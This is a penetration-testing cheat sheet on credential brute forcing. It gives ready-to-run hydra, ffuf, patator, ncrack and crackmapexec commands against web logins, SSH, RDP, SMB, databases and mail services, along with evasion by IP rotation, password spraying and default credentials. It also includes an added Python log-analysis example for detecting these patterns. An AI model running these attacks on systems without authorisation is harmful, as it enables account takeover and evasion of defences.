# Bruteforcing

Authentication bruteforcing attacks attempt to guess credentials or bypass login mechanisms.

> **Skill Level**: Beginner to Intermediate\
> **Prerequisites**: Basic HTTP understanding, wordlist selection

## Password Identification

```bash
# Identify hash type
hash-identifier

# Name That Hash (better)
# https://github.com/HashPals/Name-That-Hash
nth --text "5f4dcc3b5aa765d61d8327deb882cf99"

# hashid
hashid -m '$2a$10$...'  # Shows hashcat mode
```

## Wordlist Generation

```bash
# CeWL - Generate wordlist from target website
cewl https://target.com -d 3 -m 5 -w custom_wordlist.txt
cewl https://target.com --with-numbers -d 3 -w wordlist.txt

# Generate password variations
# https://github.com/edoardottt/longtongue
python3 longtongue.py -w base_words.txt -o passwords.txt

# Username wordlist from names
# https://github.com/AhmedMohamedDev/namemash.py
python namemash.py names.txt > usernames.txt
```

## HTTP Bruteforcing

### Hydra

```bash
# HTTP GET Form
hydra -L users.txt -P passwords.txt target.com http-get-form \
  "/login:username=^USER^&password=^PASS^:F=Invalid credentials"

# HTTP POST Form
hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form \
  "/login:user=^USER^&pass=^PASS^:F=Login failed" -V

# HTTPS POST Form
hydra -l admin -P passwords.txt target.com -s 443 -S https-post-form \
  "/login:username=^USER^&password=^PASS^:F=Incorrect"

# Basic Auth
hydra -L users.txt -P passwords.txt target.com http-get /admin

# With cookies
hydra -l admin -P passwords.txt target.com http-post-form \
  "/login:user=^USER^&pass=^PASS^:F=failed:H=Cookie\: session=abc123"  # colons inside a header value must be escaped as \:
```

### ffuf

```bash
# POST login form
ffuf -w users.txt:USER -w passwords.txt:PASS \
  -u https://target.com/login \
  -X POST -d "username=USER&password=PASS" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -fc 401 -mc 200,302

# With rate limiting
ffuf -w passwords.txt -u https://target.com/login \
  -X POST -d "user=admin&pass=FUZZ" \
  -rate 10 -fc 401
```

### Patator

```bash
# HTTP POST
patator http_fuzz url=https://target.com/login method=POST \
  body='{"user":"admin","password":"FILE0"}' \
  0=/path/to/passwords.txt \
  accept_cookie=1 follow=1 \
  -x ignore:fgrep='Invalid'

# HTTP Basic Auth
patator http_fuzz url=https://target.com/admin \
  user_pass=FILE0:FILE1 \
  0=users.txt 1=passwords.txt \
  -x ignore:code=401
```

## Service Bruteforcing

### SSH

```bash
hydra -l root -P passwords.txt ssh://target.com
hydra -L users.txt -P passwords.txt target.com ssh -t 4

# Medusa
medusa -h target.com -u root -P passwords.txt -M ssh

# Ncrack
ncrack -p 22 --user root -P passwords.txt target.com
```

### RDP

```bash
hydra -l administrator -P passwords.txt rdp://target.com
ncrack -p 3389 --user administrator -P passwords.txt target.com

# Crowbar (RDP specific)
crowbar -b rdp -s target.com/32 -u admin -C passwords.txt -n 1
```

### FTP

```bash
hydra -L users.txt -P passwords.txt ftp://target.com
hydra -l anonymous -P passwords.txt target.com ftp
```

### SMB

```bash
hydra -L users.txt -P passwords.txt smb://target.com
crackmapexec smb target.com -u users.txt -p passwords.txt
```

### Database Services

```bash
# MySQL
hydra -l root -P passwords.txt mysql://target.com

# PostgreSQL
hydra -l postgres -P passwords.txt postgres://target.com

# MSSQL
hydra -l sa -P passwords.txt mssql://target.com

# MongoDB
nmap -p 27017 --script mongodb-brute target.com
```

### Other Services

```bash
# SNMP
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp

# SMTP
hydra -l user@target.com -P passwords.txt smtp://target.com

# POP3
hydra -l user -P passwords.txt pop3://target.com

# IMAP
hydra -l user -P passwords.txt imap://target.com
```

## Evasion Techniques

```bash
# Slow down requests
hydra -l admin -P passwords.txt target.com http-post-form "/login:..." -t 1 -w 3

# Extra checks per account: null password (n), login as password (s), reversed login (r)
hydra ... -e nsr

# IP rotation (via proxychains)
proxychains hydra -l admin -P passwords.txt target.com http-post-form "/login:..."

# Add delays between requests (ffuf needs the FUZZ keyword somewhere in the request)
ffuf -w passwords.txt -u https://target.com/login \
  -X POST -d "user=admin&pass=FUZZ" -p 0.5-1.0
```

## Password Spraying

```bash
# Single password against many users
# https://github.com/x90skysn3k/brutespray
python brutespray.py --file nmap.gnmap -U users.txt -p 'Summer2024!' --threads 5

# CrackMapExec for AD
crackmapexec smb dc.target.com -u users.txt -p 'Password123!' --continue-on-success

# Spray single password
hydra -L users.txt -p 'Welcome1!' target.com http-post-form "/login:..."
```
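
Seen from the defending side, the patterns above (many passwords against one account, one password against many accounts, and guesses spread across rotating source IPs) look different in authentication logs. The following is an added example, not part of the original page: it classifies failed logins into those three cases. The log format, function names, window and threshold are assumptions chosen for illustration, and the log lines are constructed.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample log; the line format is an assumption for this example.
SAMPLE_LOG = """\
2024-06-01T10:00:00 FAIL user=admin src=198.51.100.7
2024-06-01T10:00:10 FAIL user=admin src=198.51.100.7
2024-06-01T10:00:20 FAIL user=admin src=198.51.100.7
2024-06-01T10:05:00 FAIL user=alice src=203.0.113.9
2024-06-01T10:07:00 FAIL user=bob src=203.0.113.9
2024-06-01T10:09:00 FAIL user=carol src=203.0.113.9
2024-06-01T10:20:00 FAIL user=root src=192.0.2.1
2024-06-01T10:22:00 FAIL user=root src=192.0.2.2
2024-06-01T10:24:00 FAIL user=root src=192.0.2.3
2024-06-01T10:30:00 FAIL user=eve src=192.0.2.50
2024-06-01T10:30:20 OK user=eve src=192.0.2.50
"""

def parse(log):
    """Return time-sorted (timestamp, result, user, source) tuples."""
    rows = []
    for line in log.strip().splitlines():
        ts, result, user, src = line.split()
        rows.append((datetime.fromisoformat(ts), result, user[5:], src[4:]))
    return sorted(rows)

def windows(items, span):
    """For each event, yield the values seen within `span` after it."""
    for i, (start, _) in enumerate(items):
        yield [v for t, v in items[i:] if t - start <= span]

def classify(events, span=timedelta(minutes=10), threshold=3):
    """Map 'src:<ip>' or 'user:<name>' to the failure pattern observed."""
    by_src, by_user = defaultdict(list), defaultdict(list)
    for ts, result, user, src in events:
        if result == "FAIL":
            by_src[src].append((ts, user))
            by_user[user].append((ts, src))
    found = {}
    for src, fails in by_src.items():
        for users in windows(fails, span):
            if len(set(users)) >= threshold:                 # one source, many accounts
                found.setdefault("src:" + src, "spray")
            elif max(Counter(users).values()) >= threshold:  # one source, one account
                found.setdefault("src:" + src, "bruteforce")
    for user, fails in by_user.items():   # keyed on the account, so IP rotation does not hide it
        if any(len(set(s)) >= threshold for s in windows(fails, span)):
            found["user:" + user] = "distributed"
    return found
```

Slow, low-rate guessing stays under a short window, so in practice the per-account check is run over a much longer span than the per-source one.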

## Default Credentials

```bash
# Check common default credentials
# https://github.com/ihebski/DefaultCreds-cheat-sheet
# https://many-passwords.github.io/

# Common defaults to try:
admin:admin
admin:password
root:root
test:test
guest:guest
```

## Wordlists

```bash
# Passwords
/usr/share/wordlists/rockyou.txt
/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt
/usr/share/seclists/Passwords/darkweb2017-top10000.txt

# Usernames
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
/usr/share/seclists/Usernames/Names/names.txt
```

## Related Topics

* [Password Cracking](/others/password-cracking.md) - Hash cracking
* [Wordlist Reference](/others/wordlist-reference.md) - Wordlist selection guide


